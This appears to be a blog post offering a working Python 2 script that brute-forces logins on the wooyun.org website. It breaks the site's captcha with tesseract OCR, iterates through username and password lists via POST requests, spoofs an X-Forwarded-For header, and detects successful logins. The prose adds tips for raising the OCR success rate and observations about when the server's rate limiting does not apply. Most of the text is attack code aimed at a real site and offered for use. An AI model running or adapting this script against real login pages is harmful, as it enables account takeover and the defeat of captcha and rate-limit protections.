The following need to be installed first:
1. pytesseract (can be installed with pip install pytesseract)
2. Python Imaging Library (PIL)
3. tesseract-ocr
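Before running the script it can help to confirm that the Python-side prerequisites are importable. The snippet below is a minimal sketch: the helper name missing_modules is hypothetical, and it only checks Python modules, not whether the tesseract-ocr binary itself is installed.

```python
import importlib


def missing_modules(names):
    """Return the subset of module names that cannot be imported."""
    missing = []
    for name in names:
        try:
            importlib.import_module(name)
        except ImportError:
            missing.append(name)
    return missing


if __name__ == '__main__':
    # "PIL" is the import name for the Python Imaging Library.
    print(missing_modules(['pytesseract', 'PIL']))
```

An empty list means both modules were found; any name that is printed still needs to be installed.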
How it works:
1. Use tesseract to recognize the captcha.
2. Brute-force the login via POST requests.
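Issue 1. Captcha recognition rate
The OCR result is filtered once. As the regular expression pattern = '^[a-zA-Z0-9]{4}$' shows, only results recognized as exactly 4 alphanumeric characters are accepted; anything else triggers a request for a new captcha. This greatly improves the effective recognition rate.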
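The filtering step described above can be isolated into a small function. This is only a sketch of the idea: the names CAPTCHA_RE and is_plausible_captcha are hypothetical, and stripping surrounding whitespace before matching is an assumption added here because OCR output often carries a trailing newline.

```python
import re

# Same pattern as in the script: exactly four ASCII letters or digits.
CAPTCHA_RE = re.compile(r'^[a-zA-Z0-9]{4}$')


def is_plausible_captcha(text):
    """Return True only if the OCR text is exactly 4 alphanumeric characters."""
    return CAPTCHA_RE.match(text.strip()) is not None
```

A result that fails this check is discarded rather than submitted, so an obviously wrong OCR reading never costs a login attempt.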
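Issue 2. Server-side rate limiting
Over two days of experiments I observed that there is a limit on the number of attempts in the morning, yet on both afternoons I made more than 1161 login attempts without hitting any limit. I don't know why; it may have been a network issue on my side.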
#coding: utf-8
#date: 2014/09/23
#author: titans
# Python 2 script (uses cookielib, urllib2 and the print statement)
import cookielib
import urllib2
import urllib
import socket
import sys
import time
import re
from PIL import Image  # the original used "import Image" (classic PIL)
import pytesseract

def guess_login(url, users, passwords):
    # One cookie jar for all requests, so the captcha and the login POST
    # belong to the same session
    cj = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    opener.addheaders = [
        ('User-Agent','Mozilla/5.0 (Windows NT 5.1; rv:24.0) Gecko/20100101 Firefox/24.0'),
        ('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'),
        ('Accept-Encoding','gzip, deflate'),
        ('Connection', 'keep-alive'),
        ('X-Forwarded-For','127.0.0.1'),
    ]
    urllib2.install_opener(opener)
    captcha = ''
    catp_url = 'http://www.wooyun.org/captcha.php'
    # Accept only OCR results that are exactly 4 letters/digits
    pattern = '^[a-zA-Z0-9]{4}$'
    regex = re.compile(pattern)
    for user in users:
        user = user.strip()
        find = False
        for password in passwords:
            while_mark = 1
            password = password.strip()
            # Keep requesting captchas until one passes the regex filter
            while(while_mark):
                opener.open(url)
                pic = opener.open(catp_url)
                content = pic.read()
                f = open('c:\\temp\\capta.jpg','wb')
                f.write(content)
                f.close()
                time.sleep(1)
                captcha = pytesseract.image_to_string(Image.open('c:\\temp\\capta.jpg'))
                re_result = regex.match(captcha)
                if re_result:
                    print user, password, captcha
                    post_data = 'email=%s&password=%s&captcha=%s'%(user,password,captcha)
                    post_url = 'http://www.wooyun.org/user.php?action=login&do=login'
                    resp = opener.open(post_url,post_data)
                    while_mark = 0
                    # A Set-Cookie header in the response is treated as a successful login
                    cookies = resp.info().getheaders('Set-Cookie')
                    if len(cookies):
                        find = True
                        raw_input('get it!!%s %s'%(user,password))
                else:
                    print '[*]repeat request'
                    pass
            # Stop trying passwords for this user once one has worked
            if find == True:
                break

def run():
    if len(sys.argv) !=3:
        usage()
    url = 'http://www.wooyun.org/user.php?action=login'
    users = open(sys.argv[1],'r').readlines()
    passwords = open(sys.argv[2],'r').readlines()
    guess_login(url, users, passwords)

def usage():
    print 'wooyun.py users.txt passwords.txt'
    exit(0)

if __name__ == '__main__':
    run()
The script is written for Windows. To test it on Linux, change the path where the captcha image is stored (c:\temp\capta.jpg) to a Linux path.
Usage: wooyun.py users.txt passwords.txt
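One way to avoid editing the path by hand on each platform is to build it from the system's temporary directory. This is a sketch rather than part of the original script; the helper name captcha_path is hypothetical, and only the file name capta.jpg is taken from the script.

```python
import os
import tempfile


def captcha_path(filename='capta.jpg'):
    """Build a path for the captcha image inside the OS temp directory."""
    return os.path.join(tempfile.gettempdir(), filename)


if __name__ == '__main__':
    print(captcha_path())
```

The returned value could then replace both hard-coded occurrences of the path in the script, at the cost of no longer controlling exactly where the image is written.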